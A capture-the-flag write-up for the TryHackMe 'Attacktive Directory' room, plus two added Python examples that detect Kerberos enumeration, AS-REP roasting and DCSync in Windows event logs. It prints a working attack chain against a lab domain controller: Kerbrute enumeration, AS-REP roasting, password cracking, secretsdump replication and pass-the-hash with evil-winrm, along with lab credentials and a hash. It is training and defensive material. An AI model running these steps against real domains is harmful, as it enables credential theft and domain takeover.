Attractive Directory Report THM


TRYHACKME | ATTRACTIVE

DIRECTORY REPORT
Machine Used: Kali Linux

Zaur Qasimov
07.07.2022

Content:
1. Intro | Setup
1. Installing Impacket
2. Installing Bloodhound and Neo4j
2. Enumeration | Welcome to Attacktive Directory
1. What tool will allow us to enumerate port 139/445?
2. What is the NetBIOS-Domain Name of the machine?
3. What invalid TLD do people commonly use for their Active Directory Domain?
3. Enumeration | Enumerating Users via Kerberos
1. What command within Kerbrute will allow us to enumerate valid usernames?
2. What notable account is discovered? (These should jump out at you)
3. What other notable account is discovered? (These should jump out at you)
4. Exploitation | Abusing Kerberos
1. We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?
2. Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)
3. What mode is the hash?
4. Now crack the hash with the modified password list provided. What is the user account's password?
5. Enumeration | Back to the Basics
1. What utility can we use to map remote SMB shares?
2. Which option will list shares?
3. How many remote shares is the server listing?
4. There is one particular share that we have access to that contains a text file. Which share is it?
5. What is the content of the file?
6. Decoding the contents of the file, what is the full contents?
6. Domain Privilege Escalation | Elevating Privileges within the Domain
1. What method allowed us to dump NTDS.DIT?
2. What is the Administrator's NTLM hash?
3. What method of attack could allow us to authenticate as the user without the password?
4. Using a tool called Evil-WinRM what option will allow us to use a hash?
7. Flag Submission | Flag Submission Panel
1. svc-admin flag
2. backup flag
3. Administrator flag

1. Intro | Setup
Attacktive Directory is a medium-level machine hosting a Windows Active Directory domain. As the room points out, more than 99% of corporate networks run on Windows Active Directory. First, we connect to TryHackMe's network using the OpenVPN configuration file.
Command: openvpn Zaur.Qasimov.ovpn
Then we click on "Start the machine" on the upper right side of the section.
IP Address: 10.10.84.141

IMPACKET INSTALLATION
Impacket has always been difficult to install correctly. Any missed step usually results in a bunch of errors when running tools from Impacket, so TryHackMe (THM) provides steps to install it correctly. If you are using THM's attack machine, Impacket and Bloodhound are already installed.

Firstly, we have to clone Impacket from the GitHub repository.


kali@kali~$ sudo git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket

Next, we shall install the requirements.


kali@kali~$ sudo pip3 install -r /opt/impacket/requirements.txt

Finally, we can run the Python installation script.


kali@kali~$ cd /opt/impacket/ && sudo python3 ./setup.py install

BLOODHOUND AND NEO4J INSTALLATION


apt install bloodhound neo4j

# if problem faced
apt update && apt upgrade

2. Enumeration | Welcome to Attacktive Directory

We first use nmap to check which services are available on the Domain Controller (DC). In this simple lab setup, only the DC is available. In other Active Directory (AD) environments we may have to enumerate and attack other workstations before we get a shot at the DC.

Command: nmap -sV -sC 10.10.84.141


1. What tool will allow us to enumerate port 139/445?

We can use enum4linux against ports 139/445 to enumerate NetBIOS/SMB information such as existing usernames, the NetBIOS domain name, the SID, etc.
Command: enum4linux 10.10.84.141

2. What is the NetBIOS-Domain Name of the machine?

You can see from the result that the domain name is THM-AD.

3. What invalid TLD do people commonly use for their Active Directory Domain?

Let's look at the hint we were given.

You can also see from the hint that the Active Directory domain name is spookysec.local. Here the invalid TLD is .local.

3. Enumeration | Enumerating Users via Kerberos

TryHackMe (THM) recommends using Kerbrute for this challenge to brute-force Kerberos (the key authentication service in Active Directory) and enumerate usernames and passwords. A modified username list and password list have been given to us. Note that brute-forcing credentials is not recommended in real environments because of account lockout policies.

Firstly, I downloaded Kerbrute to my Kali machine and made it executable.
Command:
kali@kali~$ wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
kali@kali~$ chmod +x kerbrute_linux_amd64
Next, I downloaded both the user list and the password list.
Command:
kali@kali~$ wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt
kali@kali~$ wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt

Let's get acquainted with how to use the tool now.


Command: ./kerbrute_linux_amd64 --help

1. What command within Kerbrute will allow us to enumerate valid usernames?

userenum - Enumerate valid domain usernames via Kerberos


As you can see, we will need the userenum command for this process.

2. What notable account is discovered? (These should jump out at you)

Command: ./kerbrute_linux_amd64 userenum --dc 10.10.84.141 -d spookysec.local /root/Downloads/userlist.txt

There are two users that may be of interest to us: svc-admin and backup.

4. Exploitation | Abusing Kerberos

In this challenge we can perform AS-REP Roasting, because one or more user accounts do not require Kerberos pre-authentication before requesting a ticket. Thus, we can use Impacket's /opt/impacket/examples/GetNPUsers.py to query AS-REP-roastable accounts from the Key Distribution Center (KDC). However, we will need to provide a list of usernames.

1. We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?

We have only two unusual users, svc-admin and backup. Trying both with the GetNPUsers.py tool, we find that it works for svc-admin only.
Command: GetNPUsers.py -no-pass -dc-ip 10.10.84.141 spookysec.local/svc-admin

We get the hash from the above command and store it in a file.

2. Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)

Search for the hash on the Hashcat example hashes page and you will find an entry like this:

From the image you can see that the type of the hash is Kerberos 5, etype 23, AS-REP.

3. What mode is the hash?

If we look at the left part of the picture, we see that the answer is 18200.

4. Now crack the hash with the modified password list provided. What is the user account's password?

Let's crack the hash now. Having determined the hash type, we use the modified password list provided in the challenge to crack the hash with John the Ripper.

Command: john --wordlist=passwordlist.txt --format=krb5asrep pass.txt

It should only take a few seconds to crack the hash on a Kali virtual machine. If you do it on your Windows host, it will be even faster. We should obtain the password "management2005".
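Both Kerberos steps above, the Kerbrute username enumeration and the AS-REP request for svc-admin, are visible to the Domain Controller as Security event 4768 ("A Kerberos authentication ticket (TGT) was requested"). The Python below is an added example, not part of this report and not code from Kerbrute or Impacket: it runs two detection rules over constructed 4768 records (the timestamps, usernames other than svc-admin/backup, and source IPs are made up for the sample). A burst of result code 0x6 (unknown principal) from one source flags username guessing; a successful TGT issued with pre-authentication type 0 and RC4 (etype 0x17) flags exactly the request that yields a hashcat 18200 / john krb5asrep hash.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed event 4768 records, flattened to the fields the rules need.
#   status  : 0x0 = success, 0x6 = KDC_ERR_C_PRINCIPAL_UNKNOWN (no such account)
#   preauth : 0 = no pre-authentication, 2 = PA-ENC-TIMESTAMP (the normal case)
#   etype   : 0x17 = RC4-HMAC, 0x12 = AES256-CTS-HMAC-SHA1-96
SAMPLE_4768 = [
    {"time": "2022-07-07T10:00:00", "user": "aaron",     "ip": "10.10.14.5", "status": "0x6", "preauth": "-", "etype": "0xffffffff"},
    {"time": "2022-07-07T10:00:00", "user": "abbey",     "ip": "10.10.14.5", "status": "0x6", "preauth": "-", "etype": "0xffffffff"},
    {"time": "2022-07-07T10:00:01", "user": "abigail",   "ip": "10.10.14.5", "status": "0x6", "preauth": "-", "etype": "0xffffffff"},
    {"time": "2022-07-07T10:00:01", "user": "abraham",   "ip": "10.10.14.5", "status": "0x6", "preauth": "-", "etype": "0xffffffff"},
    {"time": "2022-07-07T10:00:02", "user": "adam",      "ip": "10.10.14.5", "status": "0x6", "preauth": "-", "etype": "0xffffffff"},
    {"time": "2022-07-07T10:00:02", "user": "adrian",    "ip": "10.10.14.5", "status": "0x6", "preauth": "-", "etype": "0xffffffff"},
    {"time": "2022-07-07T10:00:03", "user": "aidan",     "ip": "10.10.14.5", "status": "0x6", "preauth": "-", "etype": "0xffffffff"},
    {"time": "2022-07-07T10:00:30", "user": "svc-admin", "ip": "10.10.14.5", "status": "0x0", "preauth": "0", "etype": "0x17"},
    {"time": "2022-07-07T10:05:00", "user": "backup",    "ip": "10.10.14.7", "status": "0x0", "preauth": "2", "etype": "0x12"},
    {"time": "2022-07-07T10:06:10", "user": "jsmith2",   "ip": "10.10.14.9", "status": "0x6", "preauth": "-", "etype": "0xffffffff"},
    {"time": "2022-07-07T10:06:20", "user": "jsmith",    "ip": "10.10.14.9", "status": "0x0", "preauth": "2", "etype": "0x12"},
]


def find_enumeration_bursts(events, threshold=5, window_seconds=60):
    """Map source IP -> largest number of distinct non-existent principals it
    requested TGTs for inside any window of `window_seconds`, keeping only
    sources that reach `threshold`. Threshold and window are assumed values
    to tune per environment (a single typo from a user should not alert)."""
    by_ip = defaultdict(list)
    for e in events:
        if e["status"].lower() == "0x6":
            by_ip[e["ip"]].append((datetime.fromisoformat(e["time"]), e["user"].lower()))
    window = timedelta(seconds=window_seconds)
    alerts = {}
    for ip, tries in by_ip.items():
        tries.sort()
        best = 0
        for i, (start, _) in enumerate(tries):
            names = {user for t, user in tries[i:] if t - start <= window}
            best = max(best, len(names))
        if best >= threshold:
            alerts[ip] = best
    return alerts


def find_asrep_roasting(events):
    """Accounts issued a TGT with no pre-authentication and an RC4-HMAC
    ticket: the request pattern that produces a Kerberos 5, etype 23,
    AS-REP hash crackable offline."""
    return sorted({e["user"] for e in events
                   if e["status"].lower() == "0x0"
                   and e["preauth"] == "0"
                   and e["etype"].lower() == "0x17"})


if __name__ == "__main__":
    for ip, n in find_enumeration_bursts(SAMPLE_4768).items():
        print(f"[enum]  {ip} requested TGTs for {n} unknown accounts within 60s")
    for user in find_asrep_roasting(SAMPLE_4768):
        print(f"[asrep] {user}: TGT issued without pre-auth using RC4; check the "
              f"'Do not require Kerberos preauthentication' flag on this account")
```

The AS-REP rule is best paired with a periodic check of which accounts have the "Do not require Kerberos preauthentication" flag set, so that a finding like svc-admin is fixed at its source rather than only alerted on; lowering the enumeration threshold trades earlier detection for noise from ordinary typos such as the jsmith2 row in the sample.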

5. Enumeration | Back to the Basics

We can now attempt to enumerate SMB shared folders using our newly found credentials.
Command: smbclient -L 10.10.82.185 -U svc-admin%management2005

4. There is one particular share that we have access to that contains a text file. Which share is it?

Going through each shared folder, I found an interesting folder to which I can log in and see an interesting text file.

Command: smbclient //10.10.82.185/backup -U svc-admin%management2005

5. What is the content of the file?

I downloaded the text file and looked at its content.

6. Decoding the contents of the file, what is the full contents?

It looks like it is base64 encoded. Decoding it reveals a valid credential.

6. Domain Privilege Escalation | Elevating Privileges within the Domain

Obtaining the credentials of backup gives us more privileges, because the backup account on this Domain Controller (DC) receives every change made to Active Directory (AD), the way a replicating DC would. As a result, we can obtain every user's password hashes. To do so, we can use Impacket's secretsdump.py.

1. What method allowed us to dump NTDS.DIT?

Command: python3 /opt/impacket/examples/secretsdump.py spookysec.local/backup:<backup-password>@10.10.82.185

Here <backup-password> stands for the credential decoded from the text file in the previous section.

As you can see from the image, the method is DRSUAPI.
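DRSUAPI is the directory replication protocol, so the secretsdump run above looks to the DC like a replication request coming from the backup account instead of from another DC. When Directory Service Access auditing and a matching SACL on the domain object are in place, each such request is logged as Security event 4662 with the replication control-access GUIDs in its Properties field. The Python below is an added example (not from this report or from Impacket) that runs that check over constructed 4662 records; the DC01$ machine account name and the event text are assumptions, and the other subject names are taken from this lab.

```python
import re

# Control-access rights that the replication (DRSUAPI) path exercises.
# Get-Changes-All is the one that returns secret attributes such as NT hashes.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
_GUID = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)

# Constructed event 4662 ("An operation was performed on an object") records,
# flattened to the subject account and the Properties text. Sample data only;
# DC01$ is an assumed domain controller machine account.
SAMPLE_4662 = [
    {"subject": "DC01$",     "properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"subject": "backup",    "properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"subject": "svc-admin", "properties": "Read Property {00000000-0000-0000-0000-000000000000}"},
]


def find_dcsync(events, domain_controllers):
    """Return one finding per replication request made by a subject that is
    not a known domain controller machine account. Each finding records the
    rights exercised and whether they are enough to read password data."""
    known_dcs = {dc.upper() for dc in domain_controllers}
    findings = []
    for e in events:
        rights = [REPLICATION_RIGHTS[g.lower()] for g in _GUID.findall(e["properties"])
                  if g.lower() in REPLICATION_RIGHTS]
        if rights and e["subject"].upper() not in known_dcs:
            findings.append({
                "subject": e["subject"],
                "rights": rights,
                "secrets": "DS-Replication-Get-Changes-All" in rights,
            })
    return findings


if __name__ == "__main__":
    for f in find_dcsync(SAMPLE_4662, ["DC01$"]):
        what = "can pull password hashes" if f["secrets"] else "can read non-secret changes"
        print(f"[dcsync] {f['subject']} exercised {', '.join(f['rights'])}: {what}")
```

Beyond alerting, the durable fix is to audit which principals hold these rights on the domain naming context: in a healthy domain only domain controller accounts and a small set of documented services should be able to exercise Get-Changes-All.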

Finally, we will need to install evil-winrm to access the system since port 5985 for
WinRM is open.
Command: sudo gem install evil-winrm
2. What is the Administrator's NTLM hash?
0e0363213e37b94221497260b0bcb4fc
3. What method of attack could allow us to authenticate as the user without
the password?
4. Using a tool called Evil-WinRM what option will allow us to use a hash?
Let's see how evil-winrm works.
Command: evil-winrm --help

As you can see, the answer is -H.

7. Flag Submission | Flag Submission Panel

Submit the flags for each user account. They can be found on each user's desktop. We can simply log in to the Administrator's account, which has access to the other users' desktops.
Command: evil-winrm -i 10.10.82.185 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc

So we found the flag of the Administrator.

Let's find the flag of svc-admin and backup in the same way.

Svc-admin flag >>>


Backup flag >>>
